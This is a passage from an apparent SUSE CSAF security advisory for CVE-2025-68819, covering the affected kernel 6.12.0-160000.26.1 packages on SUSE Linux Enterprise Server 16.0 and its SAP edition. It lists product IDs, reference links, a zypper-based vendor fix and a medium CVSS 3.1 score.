"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68819",
"url": "https://www.suse.com/security/cve/CVE-2025-68819"
},
{
"category": "external",
"summary": "SUSE Bug 1256664 for CVE-2025-68819",
"url": "https://bugzilla.suse.com/1256664"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
